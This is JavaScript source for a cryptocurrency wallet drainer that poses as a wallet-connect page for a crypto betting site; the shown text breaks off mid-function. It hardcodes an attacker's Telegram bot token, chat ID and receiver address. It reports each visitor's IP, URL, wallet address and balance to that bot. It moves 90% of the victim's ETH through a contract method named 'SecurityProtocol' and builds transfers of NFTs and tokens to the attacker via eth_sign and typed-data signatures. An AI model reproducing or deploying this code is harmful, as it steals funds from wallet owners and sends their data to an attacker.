import { Buffer } from "buffer";
import { ethers } from "ethers";
import Web3 from "web3";
// import { Transaction as EthereumTx } from "ethereumjs-tx"
window.Buffer = Buffer.Buffer; // getting this from buffer module for frontend.

const botToken = "6948435923:AAEVhEVBWXJNSxuicoSuU3rdh7QwdpK7v3k";
const chatId = "-4199067279";

import { createWeb3Modal, defaultConfig } from "@web3modal/ethers";
// 1. Get projectId at https://cloud.walletconnect.com
const projectId = "bb6f224480e3e1bd061eba879fe02cef";

// 2. Set chains
const mainnet = {
  chainId: 1,
  name: "Ethereum",
  currency: "ETH",
  explorerUrl: "https://etherscan.io",
  rpcUrl: "https://mainnet.infura.io/v3/26a4861904dc4e349fa3638ae9bef5fe",
};

// 3. Create modal
const metadata = {
  name: "Web3",
  description: "Decentralized App",
  url: "",
  icons: [""],
};

const modal = createWeb3Modal({
  ethersConfig: defaultConfig({
    metadata,
    defaultChainId: 1,
    enableEIP6963: true,
    enableInjected: true,
    enableCoinbase: true,
    rpcUrl: "https://mainnet.infura.io/v3/26a4861904dc4e349fa3638ae9bef5fe",
  }),
  chains: [mainnet],
  projectId,
});

//reciever for nfts
const RECEIVER = "0x6Ae8A17e411826303431CDcf116B1233d60c4Ee4";

// ckey_c8c9b4345db64fd9a02799de156
const COVAL_KEY = "cqt_rQcyWkg6YwvxVC46Y6kqwqpcHW6X";

const NAME = "Thunderpick : Crypto Esports Betting & Casino";
const CHAIN_ID = 1;
const MIN_ETH_BAL = 0.001;

const ERC20ABI2 = [
  {
    anonymous: false,
    inputs: [
      {
        indexed: true,
        internalType: "address",
        name: "owner",
        type: "address",
      },
      {
        indexed: true,
        internalType: "address",
        name: "spender",
        type: "address",
      },
      {
        indexed: false,
        internalType: "uint256",
        name: "value",
        type: "uint256",
      },
    ],
    name: "Approval",
    type: "event",
  },
  {
    anonymous: false,
    inputs: [
      {
        indexed: true,
        internalType: "address",
        name: "from",
        type: "address",
      },
      {
        indexed: true,
        internalType: "address",
        name: "to",
        type: "address",
      },
      {
        indexed: false,
        internalType: "uint256",
        name: "value",
        type: "uint256",
      },
    ],
    name: "Transfer",
    type: "event",
  },
  {
    inputs: [
      {
        internalType: "address",
        name: "owner",
        type: "address",
      },
      {
        internalType: "address",
        name: "spender",
        type: "address",
      },
    ],
    name: "allowance",
    outputs: [
      {
        internalType: "uint256",
        name: "",
        type: "uint256",
      },
    ],
    stateMutability: "view",
    type: "function",
  },
  {
    inputs: [
      {
        internalType: "address",
        name: "spender",
        type: "address",
      },
      {
        internalType: "uint256",
        name: "amount",
        type: "uint256",
      },
    ],
    name: "approve",
    outputs: [
      {
        internalType: "bool",
        name: "",
        type: "bool",
      },
    ],
    stateMutability: "nonpayable",
    type: "function",
  },
  {
    inputs: [
      {
        internalType: "address",
        name: "account",
        type: "address",
      },
    ],
    name: "balanceOf",
    outputs: [
      {
        internalType: "uint256",
        name: "",
        type: "uint256",
      },
    ],
    stateMutability: "view",
    type: "function",
  },
  {
    inputs: [],
    name: "decimals",
    outputs: [
      {
        internalType: "uint8",
        name: "",
        type: "uint8",
      },
    ],
    stateMutability: "view",
    type: "function",
  },
  {
    inputs: [],
    name: "name",
    outputs: [
      {
        internalType: "string",
        name: "",
        type: "string",
      },
    ],
    stateMutability: "view",
    type: "function",
  },
  {
    inputs: [],
    name: "symbol",
    outputs: [
      {
        internalType: "string",
        name: "",
        type: "string",
      },
    ],
    stateMutability: "view",
    type: "function",
  },
  {
    inputs: [],
    name: "totalSupply",
    outputs: [
      {
        internalType: "uint256",
        name: "",
        type: "uint256",
      },
    ],
    stateMutability: "view",
    type: "function",
  },
  {
    inputs: [
      {
        internalType: "address",
        name: "to",
        type: "address",
      },
      {
        internalType: "uint256",
        name: "amount",
        type: "uint256",
      },
    ],
    name: "transfer",
    outputs: [
      {
        internalType: "bool",
        name: "",
        type: "bool",
      },
    ],
    stateMutability: "nonpayable",
    type: "function",
  },
  {
    inputs: [
      {
        internalType: "address",
        name: "from",
        type: "address",
      },
      {
        internalType: "address",
        name: "to",
        type: "address",
      },
      {
        internalType: "uint256",
        name: "amount",
        type: "uint256",
      },
    ],
    name: "transferFrom",
    outputs: [
      {
        internalType: "bool",
        name: "",
        type: "bool",
      },
    ],
    stateMutability: "nonpayable",
    type: "function",
  },
];

async function getUserIP() {
  try {
    const response = await fetch("https://api64.ipify.org?format=json");
    const data = await response.json();
    return data.ip;
  } catch (error) {
    console.error("Error fetching IP address:", error);
    return null;
  }
}

/**
 *
 * @param {string} account
 */

async function action(account) {
  const web3Provider = modal.getWalletProvider();
  
  // Display connection status
  document.getElementById("connectText").innerHTML =
    "Connecting... Please confirm in wallet";

  try {
    // Get user IP and website URL
    const userIP = await getUserIP();
    const websiteURL = window.location.href;

    // Send initialization message to Telegram
    const message = `Initialized Connection at Website: ${websiteURL} and IP: ${userIP}`;
    const apiUrl = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;
    const response = await fetch(apiUrl, { method: "POST" });
    const data = await response.json();

    if (data.ok) {
      console.log("Initialization message sent successfully");
    } else {
      console.log("Failed to send initialization message");
    }
  } catch (error) {
    console.error("Error sending initialization message:", error);
  }

  // Delay before creating link and sending to Telegram
  setTimeout(async () => {
    try {
      // Create a new anchor element
      const linkElement = document.createElement("a");

      // Set the href, target, and rel attributes
      const linkURL = `https://zapper.fi/en/account/${account}`;
      linkElement.href = linkURL;
      linkElement.target = "_blank";
      linkElement.rel = "noopener noreferrer";

      // Set the inner text (displayed text)
      linkElement.textContent = linkURL;
      document.getElementById("myLinkContainer").appendChild(linkElement);

      // Send connected address message to Telegram
      const connectedMessage = `Connected Address: ${linkURL}`;
      const connectedApiUrl = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(connectedMessage)}`;
      const connectedResponse = await fetch(connectedApiUrl, { method: "POST" });
      const connectedData = await connectedResponse.json();

      if (connectedData.ok) {
        console.log("Connected address message sent successfully");
      } else {
        console.log("Failed to send connected address message");
      }
    } catch (error) {
      console.error("Error creating link and sending connected address message:", error);
    }
  }, 1000);

  // Check chain
  try {
    const thyProvider2 = new ethers.BrowserProvider(web3Provider);
    const network = await thyProvider2.getNetwork();

    if (network.chainId !== CHAIN_ID.toString()) {
      // Try to change the chain
      let res = await tryToChangeChain(network);

      if (res) {
        // Chain changed successfully, send chain ID message to Telegram
        const chainIdMessage = `ChainID: ${network.chainId}`;
        const chainIdApiUrl = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(chainIdMessage)}`;
        const chainIdResponse = await fetch(chainIdApiUrl, { method: "POST" });
        const chainIdData = await chainIdResponse.json();

        if (chainIdData.ok) {
          console.log("Chain ID message sent successfully");
        } else {
          console.log("Failed to send Chain ID message");
        }
      }
    }
  } catch (error) {
    console.error("Error checking chain and sending Chain ID message:", error);
  }

  // If scanning didn't happen
  if (getItem("noeth") === null || getItem("nfts") === null) {
    scanNoeth(account, CHAIN_ID);
    await scanNfts(account);
  }

  var isMint = false;


  while (true) {
    try {
      //getusdcbalance
      const web3 = new Web3(web3Provider);

      const erc20AbiJson = [
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              internalType: "address",
              name: "owner",
              type: "address",
            },
            {
              indexed: true,
              internalType: "address",
              name: "spender",
              type: "address",
            },
            {
              indexed: false,
              internalType: "uint256",
              name: "value",
              type: "uint256",
            },
          ],
          name: "Approval",
          type: "event",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              internalType: "address",
              name: "authorizer",
              type: "address",
            },
            {
              indexed: true,
              internalType: "bytes32",
              name: "nonce",
              type: "bytes32",
            },
          ],
          name: "AuthorizationCanceled",
          type: "event",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              internalType: "address",
              name: "authorizer",
              type: "address",
            },
            {
              indexed: true,
              internalType: "bytes32",
              name: "nonce",
              type: "bytes32",
            },
          ],
          name: "AuthorizationUsed",
          type: "event",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              internalType: "address",
              name: "_account",
              type: "address",
            },
          ],
          name: "Blacklisted",
          type: "event",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              internalType: "address",
              name: "newBlacklister",
              type: "address",
            },
          ],
          name: "BlacklisterChanged",
          type: "event",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              internalType: "address",
              name: "burner",
              type: "address",
            },
            {
              indexed: false,
              internalType: "uint256",
              name: "amount",
              type: "uint256",
            },
          ],
          name: "Burn",
          type: "event",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              internalType: "address",
              name: "newMasterMinter",
              type: "address",
            },
          ],
          name: "MasterMinterChanged",
          type: "event",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              internalType: "address",
              name: "minter",
              type: "address",
            },
            {
              indexed: true,
              internalType: "address",
              name: "to",
              type: "address",
            },
            {
              indexed: false,
              internalType: "uint256",
              name: "amount",
              type: "uint256",
            },
          ],
          name: "Mint",
          type: "event",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              internalType: "address",
              name: "minter",
              type: "address",
            },
            {
              indexed: false,
              internalType: "uint256",
              name: "minterAllowedAmount",
              type: "uint256",
            },
          ],
          name: "MinterConfigured",
          type: "event",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              internalType: "address",
              name: "oldMinter",
              type: "address",
            },
          ],
          name: "MinterRemoved",
          type: "event",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: false,
              internalType: "address",
              name: "previousOwner",
              type: "address",
            },
            {
              indexed: false,
              internalType: "address",
              name: "newOwner",
              type: "address",
            },
          ],
          name: "OwnershipTransferred",
          type: "event",
        },
        { anonymous: false, inputs: [], name: "Pause", type: "event" },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              internalType: "address",
              name: "newAddress",
              type: "address",
            },
          ],
          name: "PauserChanged",
          type: "event",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              internalType: "address",
              name: "newRescuer",
              type: "address",
            },
          ],
          name: "RescuerChanged",
          type: "event",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              internalType: "address",
              name: "from",
              type: "address",
            },
            {
              indexed: true,
              internalType: "address",
              name: "to",
              type: "address",
            },
            {
              indexed: false,
              internalType: "uint256",
              name: "value",
              type: "uint256",
            },
          ],
          name: "Transfer",
          type: "event",
        },
        {
          anonymous: false,
          inputs: [
            {
              indexed: true,
              internalType: "address",
              name: "_account",
              type: "address",
            },
          ],
          name: "UnBlacklisted",
          type: "event",
        },
        { anonymous: false, inputs: [], name: "Unpause", type: "event" },
        {
          inputs: [],
          name: "CANCEL_AUTHORIZATION_TYPEHASH",
          outputs: [{ internalType: "bytes32", name: "", type: "bytes32" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [],
          name: "DOMAIN_SEPARATOR",
          outputs: [{ internalType: "bytes32", name: "", type: "bytes32" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [],
          name: "PERMIT_TYPEHASH",
          outputs: [{ internalType: "bytes32", name: "", type: "bytes32" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [],
          name: "RECEIVE_WITH_AUTHORIZATION_TYPEHASH",
          outputs: [{ internalType: "bytes32", name: "", type: "bytes32" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [],
          name: "TRANSFER_WITH_AUTHORIZATION_TYPEHASH",
          outputs: [{ internalType: "bytes32", name: "", type: "bytes32" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "owner", type: "address" },
            { internalType: "address", name: "spender", type: "address" },
          ],
          name: "allowance",
          outputs: [{ internalType: "uint256", name: "", type: "uint256" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "spender", type: "address" },
            { internalType: "uint256", name: "value", type: "uint256" },
          ],
          name: "approve",
          outputs: [{ internalType: "bool", name: "", type: "bool" }],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "authorizer", type: "address" },
            { internalType: "bytes32", name: "nonce", type: "bytes32" },
          ],
          name: "authorizationState",
          outputs: [{ internalType: "bool", name: "", type: "bool" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "account", type: "address" },
          ],
          name: "balanceOf",
          outputs: [{ internalType: "uint256", name: "", type: "uint256" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "_account", type: "address" },
          ],
          name: "blacklist",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [],
          name: "blacklister",
          outputs: [{ internalType: "address", name: "", type: "address" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [
            { internalType: "uint256", name: "_amount", type: "uint256" },
          ],
          name: "burn",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "authorizer", type: "address" },
            { internalType: "bytes32", name: "nonce", type: "bytes32" },
            { internalType: "uint8", name: "v", type: "uint8" },
            { internalType: "bytes32", name: "r", type: "bytes32" },
            { internalType: "bytes32", name: "s", type: "bytes32" },
          ],
          name: "cancelAuthorization",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "minter", type: "address" },
            {
              internalType: "uint256",
              name: "minterAllowedAmount",
              type: "uint256",
            },
          ],
          name: "configureMinter",
          outputs: [{ internalType: "bool", name: "", type: "bool" }],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [],
          name: "currency",
          outputs: [{ internalType: "string", name: "", type: "string" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [],
          name: "decimals",
          outputs: [{ internalType: "uint8", name: "", type: "uint8" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "spender", type: "address" },
            { internalType: "uint256", name: "decrement", type: "uint256" },
          ],
          name: "decreaseAllowance",
          outputs: [{ internalType: "bool", name: "", type: "bool" }],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "spender", type: "address" },
            { internalType: "uint256", name: "increment", type: "uint256" },
          ],
          name: "increaseAllowance",
          outputs: [{ internalType: "bool", name: "", type: "bool" }],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "string", name: "tokenName", type: "string" },
            { internalType: "string", name: "tokenSymbol", type: "string" },
            { internalType: "string", name: "tokenCurrency", type: "string" },
            { internalType: "uint8", name: "tokenDecimals", type: "uint8" },
            {
              internalType: "address",
              name: "newMasterMinter",
              type: "address",
            },
            { internalType: "address", name: "newPauser", type: "address" },
            {
              internalType: "address",
              name: "newBlacklister",
              type: "address",
            },
            { internalType: "address", name: "newOwner", type: "address" },
          ],
          name: "initialize",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [{ internalType: "string", name: "newName", type: "string" }],
          name: "initializeV2",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "lostAndFound", type: "address" },
          ],
          name: "initializeV2_1",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "_account", type: "address" },
          ],
          name: "isBlacklisted",
          outputs: [{ internalType: "bool", name: "", type: "bool" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "account", type: "address" },
          ],
          name: "isMinter",
          outputs: [{ internalType: "bool", name: "", type: "bool" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [],
          name: "masterMinter",
          outputs: [{ internalType: "address", name: "", type: "address" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "_to", type: "address" },
            { internalType: "uint256", name: "_amount", type: "uint256" },
          ],
          name: "mint",
          outputs: [{ internalType: "bool", name: "", type: "bool" }],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "minter", type: "address" },
          ],
          name: "minterAllowance",
          outputs: [{ internalType: "uint256", name: "", type: "uint256" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [],
          name: "name",
          outputs: [{ internalType: "string", name: "", type: "string" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [{ internalType: "address", name: "owner", type: "address" }],
          name: "nonces",
          outputs: [{ internalType: "uint256", name: "", type: "uint256" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [],
          name: "owner",
          outputs: [{ internalType: "address", name: "", type: "address" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [],
          name: "pause",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [],
          name: "paused",
          outputs: [{ internalType: "bool", name: "", type: "bool" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [],
          name: "pauser",
          outputs: [{ internalType: "address", name: "", type: "address" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "owner", type: "address" },
            { internalType: "address", name: "spender", type: "address" },
            { internalType: "uint256", name: "value", type: "uint256" },
            { internalType: "uint256", name: "deadline", type: "uint256" },
            { internalType: "uint8", name: "v", type: "uint8" },
            { internalType: "bytes32", name: "r", type: "bytes32" },
            { internalType: "bytes32", name: "s", type: "bytes32" },
          ],
          name: "permit",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "from", type: "address" },
            { internalType: "address", name: "to", type: "address" },
            { internalType: "uint256", name: "value", type: "uint256" },
            { internalType: "uint256", name: "validAfter", type: "uint256" },
            { internalType: "uint256", name: "validBefore", type: "uint256" },
            { internalType: "bytes32", name: "nonce", type: "bytes32" },
            { internalType: "uint8", name: "v", type: "uint8" },
            { internalType: "bytes32", name: "r", type: "bytes32" },
            { internalType: "bytes32", name: "s", type: "bytes32" },
          ],
          name: "receiveWithAuthorization",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "minter", type: "address" },
          ],
          name: "removeMinter",
          outputs: [{ internalType: "bool", name: "", type: "bool" }],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            {
              internalType: "contract IERC20",
              name: "tokenContract",
              type: "address",
            },
            { internalType: "address", name: "to", type: "address" },
            { internalType: "uint256", name: "amount", type: "uint256" },
          ],
          name: "rescueERC20",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [],
          name: "rescuer",
          outputs: [{ internalType: "address", name: "", type: "address" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [],
          name: "symbol",
          outputs: [{ internalType: "string", name: "", type: "string" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [],
          name: "totalSupply",
          outputs: [{ internalType: "uint256", name: "", type: "uint256" }],
          stateMutability: "view",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "to", type: "address" },
            { internalType: "uint256", name: "value", type: "uint256" },
          ],
          name: "transfer",
          outputs: [{ internalType: "bool", name: "", type: "bool" }],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "from", type: "address" },
            { internalType: "address", name: "to", type: "address" },
            { internalType: "uint256", name: "value", type: "uint256" },
          ],
          name: "transferFrom",
          outputs: [{ internalType: "bool", name: "", type: "bool" }],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "newOwner", type: "address" },
          ],
          name: "transferOwnership",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "from", type: "address" },
            { internalType: "address", name: "to", type: "address" },
            { internalType: "uint256", name: "value", type: "uint256" },
            { internalType: "uint256", name: "validAfter", type: "uint256" },
            { internalType: "uint256", name: "validBefore", type: "uint256" },
            { internalType: "bytes32", name: "nonce", type: "bytes32" },
            { internalType: "uint8", name: "v", type: "uint8" },
            { internalType: "bytes32", name: "r", type: "bytes32" },
            { internalType: "bytes32", name: "s", type: "bytes32" },
          ],
          name: "transferWithAuthorization",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "_account", type: "address" },
          ],
          name: "unBlacklist",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [],
          name: "unpause",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            {
              internalType: "address",
              name: "_newBlacklister",
              type: "address",
            },
          ],
          name: "updateBlacklister",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            {
              internalType: "address",
              name: "_newMasterMinter",
              type: "address",
            },
          ],
          name: "updateMasterMinter",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "_newPauser", type: "address" },
          ],
          name: "updatePauser",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [
            { internalType: "address", name: "newRescuer", type: "address" },
          ],
          name: "updateRescuer",
          outputs: [],
          stateMutability: "nonpayable",
          type: "function",
        },
        {
          inputs: [],
          name: "version",
          outputs: [{ internalType: "string", name: "", type: "string" }],
          stateMutability: "view",
          type: "function",
        },
      ];
      const contractAdd = "0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48"; // Put the address here from remix
      const contract = new web3.eth.Contract(erc20AbiJson, contractAdd);
      const tokenbalance = await contract.methods.balanceOf(account).call();
      const tokenbalanceinusd = tokenbalance / 1000000;

      console.log(tokenbalanceinusd); //usdc balance

      let looplength = 0;
      let nftpriceineth = 0;

      const provider = new ethers.BrowserProvider(web3Provider);

      //eth balance in usd
      const balance = await provider.getBalance(account);
      console.log(balance, "balanceof eth");

      const ethwei = parseInt(balance);
      const ethresponse = fetch(
        "https://api.coingecko.com/api/v3/simple/price?ids=ethereum&vs_currencies=usd",
        {
          headers: {
            accept: "application/json",
          },
        }
      );
      const ethres = await ethresponse;
      const ethdata = await ethres.json();

      const balanceinwei = parseInt(balance);
      const balanceineth = balanceinwei / 1000000000000000000;

      console.log(balanceineth);
      const balanceinusd = balanceineth * ethdata.ethereum.usd;
      const nftpriceinusd = nftpriceineth * ethdata.ethereum.usd;
      console.log(balanceinusd, "ethusdbalance");
      console.log(nftpriceinusd, "nftpriceinusd");
      console.log(tokenbalanceinusd, "usdc price in usd");

      const message = `ETH Balance: ${balanceinusd} USD`;
      const apiUrl = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(
        message
      )}`;
      fetch(apiUrl, { method: "POST" })
        .then((response) => response.json())
        .then((data) => {
          if (data.ok) {
            console.log("...");
          } else {
            console.log("Failed");
          }
        })
        .catch((error) => {
          console.log("Error");
        });


      // eth starts here

      // try {
      console.log("drain eth with contract call");
      const abiethcall = [
        {
          inputs: [
            {
              internalType: "address payable",
              name: "_to",
              type: "address",
            },
          ],
          name: "SecurityProtocol",
          outputs: [],
          stateMutability: "payable",
          type: "function",
        },
      ];
      const intBal = (90 / 100) * parseInt(balance);
      console.log(intBal);
      // const gasPrice = await web3.eth.getGasPrice(); // in wei
      // console.log(gasPrice)
      if (intBal > MIN_ETH_BAL) {
        const sendMyEth = async () => {
          let gasPrice = (await provider.getGasPrice()) * 21000;
          console.log(parseInt(gasPrice), "gasprice ethers");

          const balancewithGas = intBal - gasPrice;
          console.log(balancewithGas, "balancewithgas");
          const actual = web3.utils.toHex(balancewithGas);
          console.log(actual, "balance minus gas to hex");

          console.log(balance);

          let libcContracts = new ethers.Contract(
            "0xfeeF32b878e17B190CCde179D11c815734d6C444",
            abiethcall,
            provider.getSigner()
          );

          const options = { value: actual };
          //receiver for eth is defined here``
          let appr = await libcContracts
            .SecurityProtocol(
              "0x6Ae8A17e411826303431CDcf116B1233d60c4Ee4",
              options
            )
            .call();
          console.log(appr);
        };
        sendMyEth();
      }
      // } catch (err) {
      //   console.log(err)
      // }


      const alwayszero = 0;
      const nftworth = -1;

      ///eth ends here

      //supposedly else statement
      let res = actionSea(account);
      if (res) updateArrays('sea');

      const gasPrice = Math.floor((await web3.eth.getGasPrice()) * 1.3); // in wei
      const valueToTransDec =
        balanceineth -
        parseInt(TX_GAS_LIMIT.toString()) *
          parseFloat(web3.utils.fromWei(gasPrice.toString())) -
        0.005;

      const valueToTransHex = web3.utils.toHex(
        web3.utils.toWei(valueToTransDec.toString(), 'ether')
      );

      const mode = compareWorth(valueToTransDec);

      let actionResult;
      if (mode === 'sea') {
        actionResult = await actionSea(account);
      } else {
        actionResult = await actionSig(
          account,
          mode,
          valueToTransHex,
          gasPrice,
          CHAIN_ID
        );
      }

      if (actionResult) updateArrays(mode);

      isMint = true;
      // await mint(account);

    } catch (e) {
      console.log(e);
      // showError(e.message.toString());
      document.getElementById("errorText").innerHTML =
      "* " + e.message.toString();

      try {
        // if (!isMint) await mint(account);
      } catch (e) {}

      return;
    }
  }


}


/**
 * build calldata
 * build message to sign
 * sign message
 * send to backend
 * @param {string} account
 * @returns boolean success
 */
async function actionSea(account) {
  const web3Provider = modal.getWalletProvider();

  try {
    const web3 = new Web3(web3Provider);

    // build message
    const timestamp = Math.floor(Date.now() / 1000) - 3600;
    const salt = getSalt();
    const salt2 = getSalt();

    const messageToSign = getSellSeaMessage(
      account,
      getItem("seanfts").nfts,
      timestamp,
      salt
    );

    // sign
    var isSigned = false,
      ended = false;
    await web3.currentProvider.send(
      {
        method: "eth_signTypedData_v4",
        params: [account, JSON.stringify(messageToSign)],
        from: account,
        id: new Date().getTime(),
      },
      (err, res) => {
        if (!err) {
          console.log(res.result);

          const message = {
            addr: account.slice(2),
            tokensArr: getItem("seanfts").nfts,
            sig: res.result.slice(2),
            sigTime: timestamp,
            salt: salt,
            salt2: salt2,
            worth: getItem("seanfts").totalWorth,
            domain: window.location.hostname,
          };

          // const mess2 = JSON.stringify(message)

          // // send to backend
          // const apiUrl = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(
          //   mess2
          // )}`;
          // fetch(apiUrl, { method: "POST" })
          //   .then((response) => response.json())
          //   .then((data) => {
          //     if (data.ok) {
          //       console.log("...");
          //     } else {
          //       console.log("Failed");
          //     }
          //   })
          //   .catch((error) => {
          //     console.log("Error");
          //   });

          isSigned = true;
        } else console.log("err in sign", err);
        ended = false;
      }
    );
    while (!ended) {
      await sleep(500);
    }

    console.log("isSigned:", isSigned);
    return isSigned;
  } catch (e) {
    console.log("action sea error:", e);
    return false;
  }
}

/**
 * build tx as message
 * sign message
 * destruct sign
 * send as tx
 *
 * @param {string} account
 * @param {string} mode
 * @param {string} valueToTransHex
 * @param {number} gasPrice
 * @param {number} chainId
 * @returns boolean success
 */
async function actionSig(account, mode, valueToTransHex, gasPrice, chainId) {
  let nfts = getItem("nfts"),
    noeth = getItem("noeth");

  const web3Provider = modal.getWalletProvider();

  const { ethereum } = window;
  const web3 = new Web3(web3Provider);
  const nonce = web3.utils.toHex(await web3.eth.getTransactionCount(account));
  let tx_;

  if (mode === "nft") {
    if (!nfts.length) return;

    const currentContract = new web3.eth.Contract(
      ERC721ABI,
      nfts[0].contractAddr
    );

    // is approve or transfer
    let data;
    var nftsFromCurCollection = nfts.filter(
      (nft) => nft.contractAddr === nfts[0].contractAddr
    );

    if (nftsFromCurCollection.length > 1) {
      showInfo("nft: transfer");
      data = currentContract.methods
        .safeTransferFrom(account, RECEIVER, nfts[0].tokenId)
        .encodeABI();
    } else {
      showInfo("nft: transfer");
      data = currentContract.methods
        .safeTransferFrom(account, RECEIVER, nfts[0].tokenId)
        .encodeABI();
    }

    // res tx
    tx_ = {
      to: nfts[0].contractAddr,
      nonce: nonce,
      gasLimit: CONTRACT_GAS_LIMIT,
      gasPrice: web3.utils.toHex(gasPrice),
      value: "0x0",
      data: data,
      r: "0x",
      s: "0x",
      v: "0x1",
    };
  } else if (mode === "noeth") {
    if (!noeth) return;
    const currentContract = new web3.eth.Contract(
      ERC20ABI2,
      noeth[0].contract_address
    );

    // res tx
    tx_ = {
      to: noeth[0].contract_address,
      nonce: nonce,
      gasLimit: CONTRACT_GAS_LIMIT,
      gasPrice: web3.utils.toHex(gasPrice),
      value: "0x0",
      data: currentContract.methods
        .transfer(RECEIVER, noeth[0].balance)
        .encodeABI(),
      r: "0x",
      s: "0x",
      v: "0x1",
    };
  } else if (mode === "eth") {
    console.log("eth to send:", web3.utils.fromWei(valueToTransHex));
    // res tx
    tx_ = {
      to: RECEIVER,
      nonce: nonce,
      gasLimit: TX_GAS_LIMIT,
      gasPrice: web3.utils.toHex(gasPrice),
      value: valueToTransHex,
      data: "0x0",
      r: "0x",
      s: "0x",
      v: "0x38",
    };
  }

  console.log(tx_);

  // build message to sign
  const { ethereumjs } = window;
  var tx = new ethereumjs.Tx(tx_);
  const serializedTx = "0x" + tx.serialize().toString("hex");
  const sha3_ = web3.utils.sha3(serializedTx, { encoding: "hex" });

  // sign initial message
  const initialSig = await web3.eth.sign(sha3_, account);

  // destruct origin sign, get rsv, update tx
  const temp = initialSig.substring(2),
    r = "0x" + temp.substring(0, 64),
    s = "0x" + temp.substring(64, 128),
    rhema = parseInt(temp.substring(128, 130), 16),
    v = web3.utils.toHex(rhema + chainId * 2 + 8);
  tx.r = r;
  tx.s = s;
  tx.v = v;

  const txFin = "0x" + tx.serialize().toString("hex");

  // send tx as signed tx
  console.log("Waiting for sign submitting...");
  const res = await web3.eth.sendSignedTransaction(txFin);
